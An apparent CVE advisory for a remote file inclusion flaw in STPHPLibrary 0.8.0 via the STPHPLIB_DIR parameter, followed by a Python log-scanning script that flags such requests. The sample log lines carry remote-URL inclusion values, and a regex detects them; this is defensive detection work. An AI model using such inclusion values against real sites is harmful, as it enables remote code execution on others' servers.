Stphp · Stphplibrary · CVE-2007-4737
Name of the Vulnerable Software and Affected Versions:
STPHPLibrary version 0.8.0
Description:
The issue allows remote attackers to execute arbitrary PHP code via a URL in the `STPHPLIB_DIR` parameter to API endpoints such as "stphpapplication.php", "stphpbtnimage.php", or "stphpform.php".
Recommendations:
For STPHPLibrary version 0.8.0, consider restricting access to the `STPHPLIB_DIR` parameter in the affected API endpoints until a patch is available. As a temporary workaround, avoid using the `STPHPLIB_DIR` parameter in the "stphpapplication.php", "stphpbtnimage.php", and "stphpform.php" endpoints to minimize the risk of exploitation.
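One way to check web server access logs for the requests described above, as an added example that is not part of the original advisory or of STPHPLibrary. The combined log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameter named in the advisory (compared case-insensitively).
ENDPOINTS = {"stphpapplication.php", "stphpbtnimage.php", "stphpform.php"}
PARAM = "stphplib_dir"
# A value opening with a URL scheme or "//" is not a local directory.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)
# Request field of an access log line: "METHOD target HTTP/x.y" (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2007:10:00:00 +0000] "GET /lib/stphpform.php?id=4 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Sep/2007:10:00:05 +0000] "GET /lib/STPHPForm.php?STPHPLIB_DIR=http%3A%2F%2Fhost.invalid%2Fx%2F HTTP/1.1" 200 1024',
    '203.0.113.5 - - [10/Sep/2007:10:00:09 +0000] "GET /lib/stphpbtnimage.php?stphplib_dir=./lib/ HTTP/1.1" 200 300',
    '203.0.113.9 - - [10/Sep/2007:10:00:12 +0000] "GET /index.php?STPHPLIB_DIR=http://host.invalid/ HTTP/1.1" 200 90',
    '203.0.113.9 - - [10/Sep/2007:10:00:15 +0000] "GET /lib/stphpapplication.php?STPHPLIB+DIR=ftp://host.invalid/ HTTP/1.1" 200 77',
]

def normalize_key(key):
    # PHP rewrites spaces and dots in incoming parameter names to underscores.
    return re.sub(r"[ .]", "_", key).lower()

def flag_request(target):
    """Return the remote-looking STPHPLIB_DIR value, or None if the request is clean."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in ENDPOINTS:
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if normalize_key(key) == PARAM and REMOTE_VALUE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for each log line worth investigating."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = flag_request(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: STPHPLIB_DIR supplied as {value!r}")
```

The check only sees parameters sent in the query string; values sent in a POST body do not appear in standard access logs and need request-body logging or a WAF rule instead.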